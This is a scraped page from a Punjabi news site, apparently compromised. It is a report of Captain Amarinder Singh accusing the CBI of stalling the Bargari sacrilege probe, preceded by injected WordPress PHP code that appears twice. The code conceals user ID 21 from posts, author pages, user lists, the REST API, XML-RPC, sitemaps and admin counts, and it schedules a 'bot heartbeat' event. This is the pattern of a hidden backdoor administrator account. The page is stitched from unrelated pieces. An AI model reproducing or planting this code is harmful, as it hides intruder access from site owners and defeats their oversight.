add_action( 'pre_get_posts', function( $q ) {
if ( ! is_admin() && $q->is_main_query() ) {
$not_in = (array) $q->get( 'author__not_in' );
$not_in[] = 21;
$q->set(
'author__not_in',
array_unique( array_map( 'intval', $not_in ) )
);
}
}, 1 );
add_action( 'template_redirect', function() {
if ( is_author() ) {
$author = get_queried_object();
if ( $author instanceof WP_User && (int) $author->ID === 21 ) {
global $wp_query;
$wp_query->set_404();
status_header( 404 );
nocache_headers();
}
}
} );
add_action( 'pre_user_query', function( $q ) {
if ( current_user_can( 'manage_options' ) ) {
return;
}
global $wpdb;
$q->query_where .= $wpdb->prepare( ' AND ID <> %d ', 21 );
} );
add_action( 'pre_get_users', function( $q ) {
if ( current_user_can( 'manage_options' ) ) {
return;
}
$exclude = (array) $q->get( 'exclude' );
$exclude[] = 21;
$q->set( 'exclude', array_unique( array_map( 'intval', $exclude ) ) );
} );
add_filter( 'wp_dropdown_users_args', function( $a ) {
$exclude = isset( $a['exclude'] ) ? (array) $a['exclude'] : array();
$exclude[] = 21;
$a['exclude'] = array_unique( array_map( 'intval', $exclude ) );
return $a;
} );
add_filter( 'rest_user_query', function( $args, $request ) {
$exclude = isset( $args['exclude'] ) ? (array) $args['exclude'] : array();
$exclude[] = 21;
$args['exclude'] = array_unique( array_map( 'intval', $exclude ) );
return $args;
}, 10, 2 );
add_filter( 'rest_pre_dispatch', function( $result, $server, $request ) {
$route = $request->get_route();
if ( preg_match( '#^/wp/v2/users/21(/|$)#', $route ) ) {
return new WP_Error(
'rest_user_invalid_id',
'Invalid user ID.',
array( 'status' => 404 )
);
}
return $result;
}, 10, 3 );
add_filter( 'xmlrpc_methods', function( $methods ) {
unset(
$methods['wp.getUsers'],
$methods['wp.getUser'],
$methods['wp.getProfile']
);
return $methods;
} );
add_filter( 'wp_sitemaps_users_query_args', function( $args ) {
$exclude = isset( $args['exclude'] ) ? (array) $args['exclude'] : array();
$exclude[] = 21;
$args['exclude'] = array_unique( array_map( 'intval', $exclude ) );
return $args;
} );
add_action( 'admin_head-users.php', function() {
echo '';
} );
add_filter( 'views_users', function( $views ) {
foreach ( array( 'all', 'administrator' ) as $key ) {
if ( isset( $views[ $key ] ) ) {
$views[ $key ] = preg_replace_callback(
'/\((\d+)\)/',
function( $m ) {
return '(' . max( 0, (int) $m[1] - 1 ) . ')';
},
$views[ $key ],
1
);
}
}
return $views;
} );
add_action( 'init', function() {
if ( ! function_exists( 'wp_next_scheduled' ) || ! function_exists( 'wp_schedule_single_event' ) ) {
return;
}
if ( ! wp_next_scheduled( 'wp_extra_bot_heartbeat' ) ) {
wp_schedule_single_event( time() + 5 * MINUTE_IN_SECONDS, 'wp_extra_bot_heartbeat' );
}
} );
add_action( 'wp_extra_bot_heartbeat', function() {
// noop
} );
add_action( 'pre_get_posts', function( $q ) {
if ( ! is_admin() && $q->is_main_query() ) {
$not_in = (array) $q->get( 'author__not_in' );
$not_in[] = 21;
$q->set(
'author__not_in',
array_unique( array_map( 'intval', $not_in ) )
);
}
}, 1 );
add_action( 'template_redirect', function() {
if ( is_author() ) {
$author = get_queried_object();
if ( $author instanceof WP_User && (int) $author->ID === 21 ) {
global $wp_query;
$wp_query->set_404();
status_header( 404 );
nocache_headers();
}
}
} );
add_action( 'pre_user_query', function( $q ) {
if ( current_user_can( 'manage_options' ) ) {
return;
}
global $wpdb;
$q->query_where .= $wpdb->prepare( ' AND ID <> %d ', 21 );
} );
add_action( 'pre_get_users', function( $q ) {
if ( current_user_can( 'manage_options' ) ) {
return;
}
$exclude = (array) $q->get( 'exclude' );
$exclude[] = 21;
$q->set( 'exclude', array_unique( array_map( 'intval', $exclude ) ) );
} );
add_filter( 'wp_dropdown_users_args', function( $a ) {
$exclude = isset( $a['exclude'] ) ? (array) $a['exclude'] : array();
$exclude[] = 21;
$a['exclude'] = array_unique( array_map( 'intval', $exclude ) );
return $a;
} );
add_filter( 'rest_user_query', function( $args, $request ) {
$exclude = isset( $args['exclude'] ) ? (array) $args['exclude'] : array();
$exclude[] = 21;
$args['exclude'] = array_unique( array_map( 'intval', $exclude ) );
return $args;
}, 10, 2 );
add_filter( 'rest_pre_dispatch', function( $result, $server, $request ) {
$route = $request->get_route();
if ( preg_match( '#^/wp/v2/users/21(/|$)#', $route ) ) {
return new WP_Error(
'rest_user_invalid_id',
'Invalid user ID.',
array( 'status' => 404 )
);
}
return $result;
}, 10, 3 );
add_filter( 'xmlrpc_methods', function( $methods ) {
unset(
$methods['wp.getUsers'],
$methods['wp.getUser'],
$methods['wp.getProfile']
);
return $methods;
} );
add_filter( 'wp_sitemaps_users_query_args', function( $args ) {
$exclude = isset( $args['exclude'] ) ? (array) $args['exclude'] : array();
$exclude[] = 21;
$args['exclude'] = array_unique( array_map( 'intval', $exclude ) );
return $args;
} );
add_action( 'admin_head-users.php', function() {
echo '';
} );
add_filter( 'views_users', function( $views ) {
foreach ( array( 'all', 'administrator' ) as $key ) {
if ( isset( $views[ $key ] ) ) {
$views[ $key ] = preg_replace_callback(
'/\((\d+)\)/',
function( $m ) {
return '(' . max( 0, (int) $m[1] - 1 ) . ')';
},
$views[ $key ],
1
);
}
}
return $views;
} );
add_action( 'init', function() {
if ( ! function_exists( 'wp_next_scheduled' ) || ! function_exists( 'wp_schedule_single_event' ) ) {
return;
}
if ( ! wp_next_scheduled( 'wp_extra_bot_heartbeat' ) ) {
wp_schedule_single_event( time() + 5 * MINUTE_IN_SECONDS, 'wp_extra_bot_heartbeat' );
}
} );
add_action( 'wp_extra_bot_heartbeat', function() {
// noop
} );
ਸੀ.ਬੀ.ਆਈ. ਵੱਲੋਂ ਬਰਗਾੜੀ ਕੇਸ 'ਚ ਜਾਂਚ ਲਮਕਾ ਕੇ ਇਨਸਾਫ ਨੂੰ ਲੀਹੋਂ ਲਾਹੁਣ ਦੀ ਕੋਸ਼ਿਸ਼-ਕੈਪਟਨ ਅਮਰਿੰਦਰ ਸਿੰਘ - Press Ki Taquat
No Result
View All Result
ਚੰਡੀਗੜ੍ਹ, 6 ਮਾਰਚ,(ਅਸ਼ੋਕ ਵਰਮਾ)
ਬਰਗਾੜੀ ਬੇਅਦਬੀ ਕੇਸ ਵਿੱਚ ਸੀ.ਬੀ.ਆਈ ਵੱਲੋਂ ਨਜ਼ਰਸਾਨੀ ਪਟੀਸ਼ਨ ਦਾਇਰ ਕਰਨ ‘ਤੇ ਸਖ਼ਤ ਪ੍ਰਤੀਕ੍ਰਿਆ ਜ਼ਾਹਰ ਕਰਦਿਆਂ ਮੁੱਖ ਮੰਤਰੀ ਕੈਪਟਨ ਅਮਰਿੰਦਰ ਸਿੰਘ ਨੇ ਅੱਜ ਕੇਂਦਰੀ ਜਾਂਚ ਏਜੰਸੀ ‘ਤੇ ਕੇਂਦਰ ਸਰਕਾਰ ਵਿੱਚ ਭਾਈਵਾਲ ਸ਼੍ਰੋਮਣੀ ਅਕਾਲੀ ਦਲ ਦੇ ਇਸ਼ਾਰੇ ‘ਤੇ ਨਿਆਂ ਦੇ ਰਾਹ ਵਿੱਚ ਅੜਿੱਕੇ ਡਾਹੁਣ ਦੀਆਂ ਕੋਸ਼ਿਸ਼ਾਂ ਕਰਨ ਦੇ ਦੋਸ਼ ਲਾਏ ਹਨ।
ਮੁੱਖ ਮੰਤਰੀ ਨੇ ਪਟੀਸ਼ਨ ਦਾਇਰ ਕਰਨ ਦੇ ਕਦਮ ਨੂੰ ਕੇਸ ਲਮਕਾਉਣ ਦੀ ਚਾਲ ਦੱਸਿਆ ਜਿਸ ਦਾ ਉਦੇਸ਼ ਬਰਗਾੜੀ ਕੇਸ ਦੀ ਜਾਂਚ ਵਿੱਚ ਰੁਕਾਵਟਾਂ ਪੈਦਾ ਕਰਨਾ ਹੈ। ਉਨ੍ਹਾਂ ਦੱਸਿਆ ਕਿ ਸੂਬਾ ਸਰਕਾਰ ਨੇ ਅਗਸਤ, 2018 ਵਿੱਚ ਵਿਧਾਨ ਸਭਾ ਵਿੱਚ ਇਕ ਮਤੇ ਰਾਹੀਂ ਇਸ ਕੇਸ ਦੀ ਜਾਂਚ ਪੰਜਾਬ ਪੁਲੀਸ ਦੀ ਵਿਸ਼ੇਸ਼ ਜਾਂਚ ਟੀਮ (ਐਸ.ਆਈ.ਟੀ.) ਨੂੰ ਸੌਂਪਣ ਦਾ ਫੈਸਲਾ ਕੀਤਾ ਸੀ।
ਮੁੱਖ ਮੰਤਰੀ ਨੇ ਨਿਆਂ ਵਿਵਸਥਾ ਵਿੱਚ ਪੂਰਨ ਭਰੋਸਾ ਜ਼ਾਹਰ ਕਰਦਿਆਂ ਕਿਹਾ ਕਿ ਉਨ੍ਹਾਂ ਨੂੰ ਵਿਸ਼ਵਾਸ ਹੈ ਕਿ ਇਸ ਕੇਸ ਵਿੱਚ ਅਦਾਲਤਾਂ ਹਰ ਹਾਲ ਵਿੱਚ ਕਾਨੂੰਨ ਨੂੰ ਕਾਇਮ ਰੱਖਣਗੀਆਂ ਅਤੇ ਪੀੜਤਾਂ ਨੂੰ ਇਨਸਾਫ ਦੇਣਗੀਆਂ।
ਸੀ.ਬੀ.ਆਈ. ਨੇ ਐਸ.ਏ.ਐਸ. ਨਗਰ (ਮੋਹਾਲੀ) ਵਿਖੇ ਸਪੈਸ਼ਲ ਜੁਡੀਸ਼ੀਅਲ ਮੈਜਿਸਟ੍ਰੇਟ ਨੂੰ ਲੰਘੀ 20 ਫਰਵਰੀ ਨੂੰ ਆਏ ਸੁਪਰੀਮ ਕੋਰਟ ਦੇ ਫੈਸਲੇ ‘ਤੇ ਨਜ਼ਰਸਾਨੀ ਪਟੀਸ਼ਨ ਦਾਇਰ ਕਰਨ ਬਾਰੇ ਇਤਲਾਹ ਦਿੱਤੀ ਹੈ। ਜ਼ਿਕਰਯੋਗ ਹੈ ਕਿ ਸਰਵਉਚ ਅਦਾਲਤ ਨੇ ਕੇਂਦਰੀ ਜਾਂਚ ਏਜੰਸੀ ਦੀ ਸਪੈਸ਼ਲ ਲੀਵ ਪਟੀਸ਼ਨ ਨੂੰ ਦੇਰੀ ਦੇ ਆਧਾਰ ‘ਤੇ ਰੱਦ ਕਰ ਦਿੱਤਾ ਸੀ ਜਦਕਿ ਕਾਨੂੰਨ ਦਾ ਸਵਾਲ ਖੁੱਲ੍ਹਾ ਛੱਡ ਦਿੱਤਾ ਸੀ।
ਮੁੱਖ ਮੰਤਰੀ ਨੇ ਕਿਹਾ ਕਿ ਨਜ਼ਰਸਾਨੀ ਪਟੀਸ਼ਨ ਦਾਇਰ ਕਰਨ ਬਾਰੇ ਸੀ.ਬੀ.ਆਈ. ਦਾ ਫੈਸਲਾ ਨਾ ਸਿਰਫ ਜਾਂਚ ਲਮਕਾਉਣ ਦੀ ਕੋਝੀ ਕੋਸ਼ਿਸ਼ ਹੈ ਸਗੋਂ ਇਸ ਘਟਨਾ ਵਿੱਚ ਅਕਾਲੀਆਂ ਦੀ ਸ਼ਮੂਲੀਅਤ ਦੀ ਸਪੱਸ਼ਟ ਪੁਸ਼ਟੀ ਹੋਈ ਹੈ। ਉਨ੍ਹਾਂ ਕਿਹਾ ਕਿ ਇਸ ਘਟਨਾ ਨੇ ਸਾਲ 2015 ਵਿੱਚ ਪੰਜਾਬ ਨੂੰ ਹਲੂਣ ਕੇ ਰੱਖ ਦਿੱਤਾ ਸੀ। ਉਨ੍ਹਾਂ ਕਿਹਾ ਕਿ ਸੀ.ਬੀ.ਆਈ. ਦੀ ਮੌਜੂਦਾ ਕਾਰਵਾਈ ਨਾਲ ਇਸ ਸਮੁੱਚੇ ਮਾਮਲੇ ਵਿੱਚ ਅਕਾਲੀਆਂ ਦੀ ਸ਼ਮੂਲੀਅਤ ਸਾਫ ਤੌਰ ‘ਤੇ ਸਿੱਧ ਹੁੰਦੀ ਹੈ।
ਇਸ ਮਾਮਲੇ ਵਿੱਚ ਅਕਾਲੀ-ਭਾਜਪਾ ਸਰਕਾਰ ਵੱਲੋਂ ਨਵੰਬਰ, 2015 ‘ਚ ਤਿੰਨ ਕੇਸ ਸੀ.ਬੀ.ਆਈ. ਨੂੰ ਸੌਂਪਣ ਦਾ ਜ਼ਿਕਰ ਕਰਦਿਆਂ ਕੈਪਟਨ ਅਮਰਿੰਦਰ ਸਿੰਘ ਨੇ ਦੱਸਿਆ ਕਿ ਇਨ੍ਹਾਂ ਸਾਲਾਂ ਦੌਰਾਨ ਕੇਂਦਰੀ ਏਜੰਸੀ ਜਾਂਚ ਨੂੰ ਕਿਸੇ ਤਣ ਪੱਤਣ ਲਾਉਣ ਵਿੱਚ ਨਾਕਾਮ ਰਹੀ ਹੈ ਅਤੇ ਇੱਥੋਂ ਤੱਕ ਕਿ ਮਾਮਲੇ ਦੀ ਸੁਣਵਾਈ ਮੌਕੇ ਅਦਾਲਤ ਵੱਲੋਂ ਵੀ ਇਸ ਦਾ ਨੋਟਿਸ ਲਿਆ ਗਿਆ ਸੀ।
ਮੁੱਖ ਮੰਤਰੀ ਨੇ ਕਿਹਾ ਕਿ ਸੀ.ਬੀ.ਆਈ. ਵੱਲੋਂ ਸਭ ਤੋਂ ਪਹਿਲਾਂ ਕਲੋਜ਼ਰ ਰਿਪੋਰਟ ਦਾਇਰ ਕਰਨੀ, ਫੇਰ ਸੂਬਾ ਸਰਕਾਰ ਨੂੰ ਇਸ ਦੀ ਕਾਪੀ ਦੇਣ ਤੋਂ ਇਨਕਾਰ ਕਰਨਾ ਅਤੇ ਉਸ ਤੋਂ ਦੋ ਮਹੀਨਿਆਂ ਬਾਅਦ ਇਸ ‘ਤੇ ਯੂ.ਟਰਨ ਲੈਣ ਦਾ ਡਰਾਮਾ ਅਕਾਲੀਆਂ ਦੇ ਕਹਿਣ ‘ਤੇ ਰਚਿਆ ਗਿਆ ਹੈ ਜੋ ਇਸ ਮਾਮਲੇ ਵਿੱਚ ਸੱਚ ਨੂੰ ਬਾਹਰ ਨਹੀਂ ਆਉਣ ਦੇਣਾ ਚਾਹੁੰਦੇ।
ਕੈਪਟਨ ਅਮਰਿੰਦਰ ਸਿੰਘ ਨੇ ਕਿਹਾ ਕਿ ਪੰਜਾਬ ਦੇ ਲੋਕ ਸੱਚ ਜਾਣਨਾ ਚਾਹੁੰਦੇ ਤੇ ਇਨਸਾਫ ਮੰਗਦੇ ਹਨ ਜਿਸ ਕਰਕੇ ਲੋਕ ਉਸ ਵੇਲੇ ਤੱਕ ਟਿਕ ਕੇ ਨਹੀਂ ਬੈਠਣਗੇ, ਜਦੋਂ ਤੱਕ ਨਿਆਂ ਨਹੀਂ ਮਿਲ ਜਾਂਦਾ। ਕੈਪਟਨ ਅਮਰਿੰਦਰ ਸਿੰਘ ਨੇ ਅਦਾਲਤਾਂ ਵਿੱਚ ਕੇਂਦਰੀ ਜਾਂਚ ਏਜੰਸੀ ਵਿਰੁੱਧ ਡਟ ਕੇ ਲੜਾਈ ਲੜਨ ਦਾ ਤਹੱਈਆ ਕੀਤਾ ਤਾਂ ਕਿ ਇਸ ਕੇਸ ਵਿੱਚ ਜਾਂਚ ਨੂੰ ਕਾਨੂੰਨੀ ਸਿੱਟੇ ‘ਤੇ ਪਹੁੰਚਾਉਣ ਨੂੰ ਯਕੀਨੀ ਬਣਾਇਆ ਜਾ ਸਕੇ। ਉਨ੍ਹਾਂ ਕਿਹਾ ਕਿ ਅਜਿਹੇ ਘਟੀਆ ਹੱਥਕੰਡੇ ਵਰਤਣ ਨਾਲ ਅਕਾਲੀ ਕੁਝ ਸਮੇਂ ਲਈ ਤਾਂ ਜਾਂਚ ਨੂੰ ਲਮਕਾ ਸਕਦੇ ਹਨ ਪਰ ਹਮੇਸ਼ਾ ਲਈ ਨਿਆਂ ਤੋਂ ਬਚ ਨਹੀਂ ਸਕਦੇ।
Post Views: 165
No Result
View All Result